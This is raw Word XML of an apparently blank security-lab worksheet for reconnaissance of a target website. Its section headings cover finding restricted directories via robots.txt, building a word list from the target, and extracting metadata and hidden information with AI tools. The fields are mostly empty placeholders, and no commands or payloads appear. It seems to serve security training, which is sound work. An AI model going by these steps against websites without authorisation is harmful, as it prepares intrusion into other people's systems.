            <w:tcW w:w="2354" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52D158AD" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="0028310D" w:rsidRDefault="0028310D" w:rsidP="0035479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8310D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876" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4443CAD3" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="0028310D" w:rsidRDefault="0028310D" w:rsidP="0028310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8310D" w:rsidRPr="0028310D" w14:paraId="5ABC5E8C" w14:textId="77777777" w:rsidTr="0035479D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70AC3759" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="0028310D" w:rsidRDefault="0028310D" w:rsidP="0035479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8310D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Identified Restricted Directories (robots.txt file) Successfully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19D435F7" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="0028310D" w:rsidRDefault="0028310D" w:rsidP="00843567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28310D">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D26F61B" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="0028310D" w:rsidRDefault="0028310D" w:rsidP="00843567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28310D">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028310D" w:rsidRPr="0028310D" w14:paraId="3D41D275" w14:textId="77777777" w:rsidTr="0035479D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0783FAB4" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="0028310D" w:rsidRDefault="0028310D" w:rsidP="0035479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8310D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Identified Restricted Directories </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6876" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D3576B2" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="0028310D" w:rsidRDefault="0028310D" w:rsidP="00843567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7178A6B" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="0028310D" w:rsidRDefault="0028310D" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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D25F92C" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="0028310D" w:rsidRDefault="0028310D" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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4D4DFB4" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="0028310D" w:rsidRDefault="0028310D" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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596EA9D" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="0028310D" w:rsidRDefault="0028310D" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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9B343EF" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="0028310D" w:rsidRDefault="0028310D" w:rsidP="0028310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8310D" w:rsidRPr="0028310D" w14:paraId="5B71BBB4" w14:textId="77777777" w:rsidTr="0035479D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2133B9E8" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="0028310D" w:rsidRDefault="0028310D" w:rsidP="0035479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8310D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876" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="586FC63B" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="0028310D" w:rsidRDefault="0028310D" w:rsidP="00843567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314B42D" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="0028310D" w:rsidRDefault="0028310D" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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C510E05" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="0028310D" w:rsidRDefault="0028310D" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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C93B055" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="0028310D" w:rsidRDefault="0028310D" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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8E0708A" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="0028310D" w:rsidRDefault="0028310D" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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54A38CD" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="0028310D" w:rsidRDefault="0028310D" w:rsidP="0028310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560069DC" w14:textId="77777777" w:rsidR="0028310D" w:rsidRPr="00A51A96" w:rsidRDefault="0028310D" w:rsidP="0028310D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9265"/>
      </w:tblGrid>
      <w:tr w:rsidR="0028310D" w14:paraId="39FCFCF8" w14:textId="77777777" w:rsidTr="00397240">
        <w:trPr>
          <w:trHeight w:val="3527"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9265" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68E9FC3A" w14:textId="77777777" w:rsidR="0028310D" w:rsidRDefault="0028310D" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="737E3F11" w14:textId="77777777" w:rsidR="0028310D" w:rsidRDefault="0028310D" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4D4674FF" w14:textId="77777777" w:rsidR="0028310D" w:rsidRDefault="0028310D" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2303445D" w14:textId="77777777" w:rsidR="0028310D" w:rsidRDefault="0028310D" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4F626293" w14:textId="77777777" w:rsidR="0028310D" w:rsidRDefault="0028310D" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0C6C837D" w14:textId="77777777" w:rsidR="0028310D" w:rsidRDefault="0028310D" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67DB4BE1" w14:textId="77777777" w:rsidR="006C0EBA" w:rsidRDefault="006C0EBA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EF29AE" w:rsidRPr="000F3EF2" w14:paraId="7439468D" w14:textId="77777777" w:rsidTr="005C0568">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4B6EC99C" w14:textId="4482423B" w:rsidR="00EF29AE" w:rsidRPr="000F3EF2" w:rsidRDefault="00EF29AE" w:rsidP="008519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1.11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B00BAF" w:rsidRPr="00B00BAF">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Extract Common Word List from the Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="547CB75D" w14:textId="77777777" w:rsidR="00EF29AE" w:rsidRPr="00397240" w:rsidRDefault="00EF29AE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6B6421" w:rsidRPr="006B6421" w14:paraId="53AAEDBB" w14:textId="77777777" w:rsidTr="0039724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9AF83E7" w14:textId="77777777" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="0039724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B6421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D6415F4" w14:textId="77777777" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="006B642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B6421" w:rsidRPr="006B6421" w14:paraId="36852C81" w14:textId="77777777" w:rsidTr="0039724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F6F12B2" w14:textId="77777777" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="0039724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B6421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32D28DB" w14:textId="77777777" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="006B642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B6421" w:rsidRPr="006B6421" w14:paraId="6C9419EF" w14:textId="77777777" w:rsidTr="0039724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E092DA0" w14:textId="77777777" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="0039724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B6421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DCF5776" w14:textId="77777777" w:rsidR="006B6421" w:rsidRDefault="006B6421" w:rsidP="006B642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52D1DC5" w14:textId="77777777" w:rsidR="00C41286" w:rsidRDefault="00C41286" w:rsidP="006B642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1282805" w14:textId="77777777" w:rsidR="00C41286" w:rsidRPr="006B6421" w:rsidRDefault="00C41286" w:rsidP="006B642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B6421" w:rsidRPr="006B6421" w14:paraId="7923BEDD" w14:textId="77777777" w:rsidTr="00397240">
        <w:trPr>
          <w:trHeight w:val="1403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8B3E907" w14:textId="77777777" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="0039724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B6421">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Commands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8FF671D" w14:textId="77777777" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="006B642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B6421" w:rsidRPr="006B6421" w14:paraId="3E73622E" w14:textId="77777777" w:rsidTr="0039724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B5E23E3" w14:textId="77777777" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="0039724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B6421">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Is Common Word List from the Target Generated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1593A232" w14:textId="77777777" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="006B6421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6B6421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5BC20CD6" w14:textId="77777777" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="006B6421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6B6421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6B6421" w:rsidRPr="006B6421" w14:paraId="2F902B5D" w14:textId="77777777" w:rsidTr="0039724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3E03B76" w14:textId="77777777" w:rsidR="00397240" w:rsidRDefault="006B6421" w:rsidP="0039724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6B6421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List of words from </w:t>
            </w:r>
            <w:r w:rsidR="00200A6B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the </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B8A62E3" w14:textId="5F2EDCFA" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="0039724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6B6421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target website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700990C" w14:textId="77777777" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="00843567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CFC417E" w14:textId="77777777" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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4695A55" w14:textId="77777777" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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8BB6DBC" w14:textId="77777777" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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96D8CA2" w14:textId="77777777" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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AB8D354" w14:textId="77777777" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="006B642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B6421" w:rsidRPr="006B6421" w14:paraId="662B5290" w14:textId="77777777" w:rsidTr="0039724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8DC4D33" w14:textId="77777777" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="0039724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B6421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68A8321" w14:textId="77777777" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="00843567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AD56E84" w14:textId="77777777" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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8FD9C82" w14:textId="77777777" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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46A3045" w14:textId="77777777" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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8CAA972" w14:textId="77777777" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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1D36736" w14:textId="77777777" w:rsidR="006B6421" w:rsidRPr="006B6421" w:rsidRDefault="006B6421" w:rsidP="006B642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41286" w:rsidRPr="006B6421" w14:paraId="53ACF7C0" w14:textId="77777777" w:rsidTr="0039724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DC96015" w14:textId="7206DCF3" w:rsidR="00C41286" w:rsidRPr="006B6421" w:rsidRDefault="00357473" w:rsidP="0039724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57473">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>AI Tools Used</w:t>
            </w:r>
            <w:r w:rsidR="00BB386F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A4D6547" w14:textId="36ABD1EC" w:rsidR="00C41286" w:rsidRPr="0004313F" w:rsidRDefault="0004313F" w:rsidP="00C4128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04313F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>[*Gemini, Copilot, Custom Scripts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FD6E38D" w14:textId="77777777" w:rsidR="00A54B18" w:rsidRDefault="00A54B18" w:rsidP="00C4128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1780036" w14:textId="77777777" w:rsidR="00BB386F" w:rsidRPr="0004313F" w:rsidRDefault="00BB386F" w:rsidP="00C4128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57473" w:rsidRPr="006B6421" w14:paraId="3D5F7E6F" w14:textId="77777777" w:rsidTr="0039724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5E16A0A" w14:textId="59ECDB63" w:rsidR="00357473" w:rsidRPr="00357473" w:rsidRDefault="00357473" w:rsidP="0039724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57473">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation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CA2B504" w14:textId="77777777" w:rsidR="00357473" w:rsidRDefault="00357473" w:rsidP="00C4128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25A2AD9" w14:textId="77777777" w:rsidR="00BB386F" w:rsidRDefault="00BB386F" w:rsidP="00C4128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3ADCB5E" w14:textId="77777777" w:rsidR="00BB386F" w:rsidRPr="006B6421" w:rsidRDefault="00BB386F" w:rsidP="00C4128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57473" w:rsidRPr="006B6421" w14:paraId="0938F249" w14:textId="77777777" w:rsidTr="0039724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0713F59" w14:textId="4B689B24" w:rsidR="00357473" w:rsidRPr="00357473" w:rsidRDefault="00A54B18" w:rsidP="0039724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Additional Observations &amp; Recommendations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397FFB0" w14:textId="77777777" w:rsidR="00357473" w:rsidRPr="006B6421" w:rsidRDefault="00357473" w:rsidP="00C4128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0391C2AE" w14:textId="77777777" w:rsidR="006C25DC" w:rsidRPr="00A51A96" w:rsidRDefault="006C25DC" w:rsidP="006C25DC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bookmarkStart w:id="1" w:name="_Hlk189059908"/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25DC" w14:paraId="1E1F5D24" w14:textId="77777777" w:rsidTr="0085194C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09E65213" w14:textId="77777777" w:rsidR="006C25DC" w:rsidRDefault="006C25DC" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="63E7539B" w14:textId="77777777" w:rsidR="006C25DC" w:rsidRDefault="006C25DC" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3C7F3DB2" w14:textId="77777777" w:rsidR="006C25DC" w:rsidRDefault="006C25DC" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="786EAE14" w14:textId="77777777" w:rsidR="006C25DC" w:rsidRDefault="006C25DC" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="49191BFE" w14:textId="77777777" w:rsidR="006C25DC" w:rsidRDefault="006C25DC" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6353BA4F" w14:textId="77777777" w:rsidR="006C25DC" w:rsidRDefault="006C25DC" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="1"/>
    </w:tbl>
    <w:p w14:paraId="7F2280AE" w14:textId="77777777" w:rsidR="006B6421" w:rsidRDefault="006B6421" w:rsidP="000947B4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A43EA7" w:rsidRPr="000F3EF2" w14:paraId="324AE8D6" w14:textId="77777777" w:rsidTr="005C0568">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6E724EEE" w14:textId="50AF6949" w:rsidR="00A43EA7" w:rsidRPr="000F3EF2" w:rsidRDefault="00A43EA7" w:rsidP="008519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1.12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06330E" w:rsidRPr="0006330E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Extract Metadata and Hidden Information from the Target Website using AI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53C5DC19" w14:textId="77777777" w:rsidR="00A43EA7" w:rsidRPr="00397240" w:rsidRDefault="00A43EA7" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="4"/>
          <w:szCs w:val="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6"/>
        <w:gridCol w:w="2769"/>
        <w:gridCol w:w="4505"/>
      </w:tblGrid>
      <w:tr w:rsidR="004E485B" w14:paraId="1DCAE72F" w14:textId="77777777" w:rsidTr="00397240">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2037F7AD" w14:textId="77777777" w:rsidR="004E485B" w:rsidRPr="00893B76" w:rsidRDefault="004E485B" w:rsidP="00397240">
            <w:pPr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B6009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Website URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7532" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="1E257374" w14:textId="77777777" w:rsidR="004E485B" w:rsidRDefault="004E485B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E485B" w14:paraId="5ED6E755" w14:textId="77777777" w:rsidTr="00397240">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B0C9CCB" w14:textId="43BB26ED" w:rsidR="004E485B" w:rsidRDefault="006665AF" w:rsidP="00397240">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006665AF">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Extraction Approach</w:t>
            </w:r>
            <w:r w:rsidR="004E485B" w:rsidRPr="006353B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2857" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DE7F508" w14:textId="2AD37678" w:rsidR="004E485B" w:rsidRPr="00C54B08" w:rsidRDefault="006665AF" w:rsidP="00397240">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006665AF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Method Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26B0134B" w14:textId="42D4471F" w:rsidR="004E485B" w:rsidRDefault="006665AF" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>[*</w:t>
            </w:r>
            <w:r w:rsidRPr="006665AF">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Custom Python Script, AI-generated code, OpenMetadata Extractors, etc.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BE0E07D" w14:textId="77777777" w:rsidR="004E485B" w:rsidRDefault="004E485B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D10F6C0" w14:textId="77777777" w:rsidR="004E485B" w:rsidRDefault="004E485B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E485B" w14:paraId="653C8E1E" w14:textId="77777777" w:rsidTr="00397240">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7575A1EF" w14:textId="77777777" w:rsidR="004E485B" w:rsidRDefault="004E485B" w:rsidP="00397240">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2857" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3CD249E8" w14:textId="3391D25D" w:rsidR="004E485B" w:rsidRPr="00C54B08" w:rsidRDefault="005D3C97" w:rsidP="00397240">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C97">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Metadata Extracted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A6A1B53" w14:textId="1E693D2D" w:rsidR="004E485B" w:rsidRPr="005D3C97" w:rsidRDefault="005D3C97" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C97">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>[*Title, Description, Keywords, Author, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03A73B63" w14:textId="77777777" w:rsidR="004E485B" w:rsidRDefault="004E485B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6D8935D5" w14:textId="77777777" w:rsidR="005D3C97" w:rsidRDefault="005D3C97" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="419DFE96" w14:textId="77777777" w:rsidR="004E485B" w:rsidRDefault="004E485B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E485B" w14:paraId="5815D15E" w14:textId="77777777" w:rsidTr="00397240">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F24F5A1" w14:textId="77777777" w:rsidR="004E485B" w:rsidRDefault="004E485B" w:rsidP="00397240">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2857" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27F00E70" w14:textId="568D6096" w:rsidR="004E485B" w:rsidRPr="00C54B08" w:rsidRDefault="00C33AE8" w:rsidP="00397240">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C33AE8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Hidden Information Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
